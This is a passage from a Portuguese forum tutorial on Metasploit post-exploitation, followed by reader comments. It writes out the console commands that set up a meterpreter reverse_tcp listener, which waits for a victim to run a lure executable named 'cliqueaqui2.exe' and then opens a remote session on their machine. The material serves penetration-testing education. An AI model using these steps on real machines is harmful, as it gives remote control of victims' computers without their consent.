Metasploit é uma ferramenta utilizada, em sua maior parte, por Pen Testers, para a realização de testes de penetração (penetration test), podendo ser usada pelas mais variadas áreas, para fins de testes, análises, conhecimento etc. Este artigo visa demonstrar algumas formas de uso para a pós-exploração de um alvo, usando o framework Metasploit, este que se encontra em sua versão 3.3.4-dev.
Agora que criamos nosso arquivo "cliqueaqui2.exe" e enviamos ao alvo, precisamos deixar nosso msf "escutando" as conexões, esperando a execução do nosso arquivo no alvo. Para isso dê os seguintes comandos no console do metasploit:
msf> use exploit/multi/handler
msf> set PAYLOAD Windows/meterpreter/reverse_tcp
msf> set LHOST 192.168.0.110
msf> set LPORT 4455
msf> exploit
Veja os comandos na imagem abaixo:
Ao ser executado o nosso arquivo no computador da vítima, será estabelecida uma conexão entre o atacante e o alvo. Assim ganhamos nossa shell meterpreter. Veja imagem abaixo.
Aparentemente parece que está travado, mas não está! Repare que a sessão meterpreter já foi criada, sendo assim, pressionamos Ctrl+C para finalizar este "travamento".
Agora digite o comando "sessions -l", como abaixo.
Temos uma sessão ativa com ID de número 1 identificando-a. Veja que aparentemente conectamos do IP da nossa máquina local (192.168.0.110) com o IP WAN do roteador2 (YY.YY.YY.YY).
Agora vamos interagir com o console meterpreter, basta o comando "sessions -i 1" como mostrado abaixo.
Yes! Agora sim, vamos começar o artigo! :)
[2] Comentário enviado por stremer em 03/03/2010 - 12:46h
amigo...
esse realmente ta de parabéns!!!
Você deveria ter escrito este antes do referente ao adobe.... pois esse é ideal para iniciantes... ai depois se entra nos exploits mesmo!
[3] Comentário enviado por roberto_espreto em 03/03/2010 - 12:51h
@infoslack
Muito obrigado cara! Abraços!
@stremer
Valeu mesmo cara!
Sim, escrevi este artigo "Metasploit Exploitation", antes do "Metasploit Adobe Exploit", o que aconteceu é que foi aprovado antes deste acima! :P
Abraços cara!
[6] Comentário enviado por roberto_espreto em 04/03/2010 - 10:34h
@angkor
Valeu velho! :P
Mais então cara, se você seguir alguma norma de melhor prática onde administra sua rede, não tem muito em que se preocupar.
Esse artigo tenta explicar um pouco mais a parte de pós exploração oferecido pelo metasploit, pra um "lammer" não sei se teria a capacidade suficiente pra conseguir burlar um AV ou mesmo conseguir acesso em um alvo! Com uma boa política e conscientização dos seus colaboradores, conseguirá diminuir muito as possibilidades de ataques.
Abraços.
[7] Comentário enviado por rodrigom em 15/03/2010 - 11:41h
Td bem... esse arquivo .exe que voce manda para a "vitima", pode ser um arquivo qualquer, so para estabelecer a conexao, nao precisa ser um executavel especificamente, certo ?
[10] Comentário enviado por leumas1994 em 04/10/2016 - 17:56h
Muito bom seu material, mas tenho uma dúvida.
Quando eu saio de uma sessão ela é fechada, como faço para me reconectar sem precisar matar o aplicativo exploit e abri-lo novamente?
Obrigado.